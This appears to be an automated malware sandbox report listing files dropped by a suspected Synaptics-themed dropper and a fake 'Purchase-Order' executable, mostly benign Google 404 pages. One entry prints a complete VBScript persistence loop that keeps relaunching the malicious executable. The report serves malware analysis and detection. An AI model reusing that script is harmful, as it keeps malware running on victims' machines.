                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ya0AtBZ9v4bLW7TZdgihmg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259494271929388
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0dSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                              MD5:3D324C628C58DD5F48507BDE484F2F59
                                                                                                              SHA1:4E57A1819FA8251C23164904E4C7F3AAA132CA9A
                                                                                                              SHA-256:7A0A331D5EC34A128956DB4C158F359EFCD4D22A2D88D8D4DC6FF321326B3DBF
                                                                                                              SHA-512:226776CA7A4A632A859B706DA31C97A4AF44C7B34EFC76E4827CB4EAE3A2D8FD073F6E012EA9A8811D12FCBD0F846B953F54103E6A1953AD59C93E36B35AEE29
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sVLPae061hKwcYPvfWh0pQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.268579021016645
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ObnSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tn+pAZewRDK4mW
                                                                                                              MD5:D7542C73D3B547F7734CFD1302956045
                                                                                                              SHA1:D7752CF2E82CBE1F5F152F2E9E5498F490E9EBF7
                                                                                                              SHA-256:4F9978BE7933E285537160E26747355305BE858083634E45ED7C142D12C631CA
                                                                                                              SHA-512:ADE140FDFCF39E7AA50EFB189F7EDA07B1FA5ED419095511AC763626FB456253BEA9C24D9C4594D3235DF26459547EE4E9B555CF621BDEF495E39ADD57286267
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="E2FBXiw_rt5B_UqO1PvOMQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.259627808272319
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0wCSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+5C+pAZewRDK4mW
                                                                                                              MD5:4FE9E10FA2D527B2263478809FE21ED8
                                                                                                              SHA1:827E67E9ABB5CA234AEC4A39FF47B6FC891AFF59
                                                                                                              SHA-256:CBF5237390E923ABE282EBD8F5A0BA2D4CEF387F7F65E3B4D39673280352B70B
                                                                                                              SHA-512:731E15030F3527998AB632AA6909A06F9F3A9532AC07FAEB7F35DD5EA2B991C9A7E6CDC50B0C5FA2C30FC66118C066B0558913D97643A84C0F842007B36CDFF9
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="FER-rNABIo5nJgfxpH1p9Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.248887733732372
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+045DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+jB+pAZewRDK4mW
                                                                                                              MD5:57663EA359AC4E346003E99645424429
                                                                                                              SHA1:B9400F2772F726540EF6DEF5EAF255187D2DF313
                                                                                                              SHA-256:F55FDB0A901E3910BE047BE5118BEED58F4AC228BAECF7E8547979FACE2307AF
                                                                                                              SHA-512:3CEE4AA6172AA5B98CB3FFB8F23752233F7FB67E5B6C269B94CF25C299C71FF867863EF409B73B709C8AF37C1293609DA0E5D82C9BC7F1F0906D74F877E419A4
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kxkptj61LgFozmVr2Wzkng">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.258707508013266
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+01wSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                              MD5:9D5F059D9F90C6E23CDCBB557ECF5770
                                                                                                              SHA1:9EDED410589981C3E7FE796A68CF8BB1AC0E9527
                                                                                                              SHA-256:A5017B38D201A947F0790BBDEF4F94039E8012BBF1383DD0150857EAE14FBE06
                                                                                                              SHA-512:8B863332BDCF710CBA7AC40BB258BB641922CA39350AA1C66036291F7E3F2DF8FD9FB49219660A1D1DE19432C08DC1039CBBCB4AEF2C89D9432B39395BB54496
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fkf6-ZjKBbMly_poy69ojg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2630610058717435
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+J+pAZewRDK4mW
                                                                                                              MD5:B937B07EDE646A2F1624AB9FF6A7E9FE
                                                                                                              SHA1:DB921FE54E7A1B51DD4C4162F7C0A4D6B45C1A6D
                                                                                                              SHA-256:9693EB2E8BD2FE6E0C027CDE35132BE70F210DB8B473BFAD4771D43E35028778
                                                                                                              SHA-512:1922DF3BBCE6281AB5E1C29F56D0ECCDF9ADA0191FD89A74C8E97353A0C342CCD48FF48C00F174350D9FAC0F4BBEA1BFC9910876AAFB423D246A9A59BAFA8A83
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Spvay1kDOfwzE2DjeFJ4gQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.277263113333827
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0lSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
                                                                                                              MD5:BD51BEBB7C7EEC71DAB78FA58E63EDB8
                                                                                                              SHA1:9CF4544B1E52BED81F27E66DE899B397EB8FE106
                                                                                                              SHA-256:D7CD2C302EFB6F686D1937AF1C1558409948FF77811B0B35EC601C46302471C2
                                                                                                              SHA-512:32A6CCEA89431060C73B0034FF7C6B86FE3F2AF8D400B37A381916452AC603D97EB4674AF04F1C2A7DF9FECC590089A20B6A3D316021540D4C0F9B486413159D
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NbKvGjPj1LUJNOIUdADd_w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2710307676736186
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0j4xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                              MD5:B16782A6891FBF2B4389426055E45547
                                                                                                              SHA1:6808D081993B120BA8831D781F8D5872F3B190FE
                                                                                                              SHA-256:DFA5B6B8FF13F4168AE8584BDDBA33C00A2D857E94F848D33E344B81D077DD51
                                                                                                              SHA-512:5A2E9A1D7AB1CEF3177D7700A714E0CE1C5DE70FE1121452E3624E1AFA3B1E0CC7BA6155023552C7C7E01FD1A11D2F516ABDCF1E7234F2D02C050C68C710C550
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RyQ1ecLI0F6JyR6WMLGnlA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.276549016014603
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0SSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+N+pAZewRDK4mW
                                                                                                              MD5:39C633AF6C4144E4CFA779AE694D6271
                                                                                                              SHA1:2E63FAAA5C0F8E311C4159A9CF324B956005C39B
                                                                                                              SHA-256:533424E21229BF9F1B8F47D82D1A56ACF5F5117B55CCF71E53E529262079F815
                                                                                                              SHA-512:A4E297FAE0F5CD502B75B4790135370E5B904B39EF6CA0A3ECCB08DE4835C716B71687C2053F786D584C311401297979725B064D151DEE49C8FFFDD624EACD26
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WOJD6efPhIJtta74q6ZKNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.271223733614239
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0wT5SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z5+pAZewRDK4mW
                                                                                                              MD5:F9F57D6F2E85258601A7AE7CBA853F83
                                                                                                              SHA1:8DE952AFF140060FDA514E50F4421A010FFE0662
                                                                                                              SHA-256:EE25C2D34168B018586B4DD5327DEEC0CD6B41FFD3DB4BBD676D5F55B124098B
                                                                                                              SHA-512:A78F26DF98F976BF5E1079FF9F743A063C701B91593D54C730F8820B99256C0359A48E9B99AF3A37789DE78CB0ED248388BC314A5F3C4C141F472E8CE908E2C5
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cMEAs3Q2kvspuZOAQEIzQA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.263733795126545
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
                                                                                                              MD5:A04A150B06930A6E954E82358C191F39
                                                                                                              SHA1:74F483A8115BB21EA3E23C436CDEBD086449CF82
                                                                                                              SHA-256:0D9E0B9F183F9995B249FCC2EC6478DD5A9F5248E71ACBE3E45B8693846BA74A
                                                                                                              SHA-512:D9D9ECCB452AB0554AA484E3058A1D0CCCACD3556768A696321230A0A32CFF280002F949434802D969E797973CE4504C622FEDA55E07F279E09035E30AA29887
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="iSXgbpEwfj8XD2ZdvqVB1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.266740909252909
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                              MD5:FC2D29CAB8B7B14B01A55209D0414C79
                                                                                                              SHA1:1DB86B961449C75BE7635F6DE82C70A45341570C
                                                                                                              SHA-256:62994CD5C40489C0A0BAAB7C3EBE2145CD08A87958BBC43B3EAC699843D3EE8D
                                                                                                              SHA-512:49A356D6D22AE8F9C8B851A516FB8DF673CE34D73AD8CFCF0835152C6F124C36CF00647351DDC6152CAC0518C5ABA33725ED0DBD5951696695E1035B4C6089B7
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="J1Jdw5KOQDyHZtnlwHM3Lw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267010863221998
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0AtSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                              MD5:20800095E0340E8273B76D8868C993F9
                                                                                                              SHA1:5734FD577C41A99A7F48F273161944F5D5563416
                                                                                                              SHA-256:D47082F7ED689016F04AB32BF7A2C867477E3916CF6FD101E738DE4F5DECD377
                                                                                                              SHA-512:497371BE82ED49A2496629B6B0BA112E2B864DB8CBCEB5BAF9782258DB5C63994224FF272766A92909A7592E1CC7381EEAC50124ADB81BAB5759E9F88E6C394C
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kTlj2BZbdYg_yRsjiBCESA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\Users\user\Desktop\._cache_Purchase-Order.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):853
                                                                                                              Entropy (8bit):5.3376266919007165
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:dF/UFESU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UF0t+G+7xLxe0WABNVIqZaVzgA
                                                                                                              MD5:23A91C7464359D3928C36179FCAD0B53
                                                                                                              SHA1:917A06FB409269C9FB536598103DDDA06217A172
                                                                                                              SHA-256:45C1CB2D9F050539D73A9E5E95F8F1BA9320680143710A78AE8F63A2C8515781
                                                                                                              SHA-512:57363F311D93DD80326A08EEA07BADEEB240B5F2AC3FAF40BBB307DC5F997191C2588AB747C0A68FB58064B247F23490C4F684E859019146A55C4A082781666B
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\LMDNDG.vbs, Author: Joe Security
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_Purchase-Order.exe"..fileset = """C:\Users\user\Desktop\._cache_Purchase-Order.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.283029620537646
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0aD7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
                                                                                                              MD5:5BC7C1C783EB3C15AB7AFDE311FBA740
                                                                                                              SHA1:1B3E0522F882A6B2F5D67619C6976587FF77B5CE
                                                                                                              SHA-256:D21E5F978152C3DB668C663CCC96B61CE32CA7577BBEFE2538DBFB245501FC76
                                                                                                              SHA-512:4B66EA30C783DF39C40EEE94FB26614962134F45774E3F00FD36C7F074F71F82A5D7A57AC02AAC2487839C1CD13F769024A7C2BD19E156E6122570F41553F839
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vSgjYZxX2oy8PAMqBUPDWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
